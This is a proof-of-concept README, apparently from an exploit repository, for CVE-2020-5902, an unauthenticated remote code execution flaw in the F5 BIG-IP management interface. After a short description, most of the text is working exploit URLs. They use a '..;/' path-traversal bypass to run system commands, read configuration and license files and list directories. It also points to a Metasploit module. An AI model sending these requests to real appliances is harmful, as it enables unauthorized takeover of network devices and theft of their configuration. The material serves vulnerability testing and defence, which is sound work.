[CVE-2020-5902] F5 BIG-IP Remote Code Execution (RCE)<b>[CVE-2020-5902] F5 BIG-IP Traffic Management User Interface (TMUI) Remote Code Execution</b>
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
In BIG-IP versions `15.0.0-15.1.0.3`, `14.1.0-14.1.2.5`, `13.1.0-13.1.3.3`, `12.1.0-12.1.5.1`, and `11.6.1-11.6.5.1`, the Traffic Management User Interface (TMUI), also referred to as the Configuration utility, has a Remote Code Execution (RCE) vulnerability in undisclosed pages.
This vulnerability allows for unauthenticated attackers, or authenticated users, with network access to the Configuration utility, through the BIG-IP management port and/or self IPs, to execute arbitrary system commands, create or delete files, disable services, and/or execute arbitrary Java code. This vulnerability may result in complete system compromise. The BIG-IP system in Appliance mode is also vulnerable. This issue is not exposed on the data plane; only the control plane is affected.
```
https://{host}/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=whoami
```
```
https://{host}/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=list+auth+user+admin
```
```
https://{host}/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/f5-release
```
```
https://{host}/tmui/login.jsp/..;/tmui/system/user/authproperties.jsp
```
```
https://{host}/tmui/login.jsp/..;/tmui/util/getTabSet.jsp?tabId=jaffa
```
```
https://{host}/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/config/bigip.license
```
```
https://{host}/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/config/bigip.conf
```
```
https://{host}/tmui/login.jsp/..;/tmui/locallb/workspace/directoryList.jsp?directoryPath=/usr/local/www/
```
Original security advisory has published by F5 and you can reach it out from [here](https://support.f5.com/csp/article/K52145254)<br>
Also, there is a metasploit module available for CVE-2020-5902 with Excellent ranking. You can find out ruby codes of metasploit module for [`exploits/linux/http/f5_bigip_tmui_rce.rb`](https://github.com/rapid7/metasploit-framework/blob/0417e88ff24bf05b8874c953bd91600f10186ba4/modules/exploits/linux/http/f5_bigip_tmui_rce.rb)
[4.0K] /data/pocs/84a53c455defdb76e25af820a6fac2af94f26755
└── [2.2K] README.md
0 directories, 1 file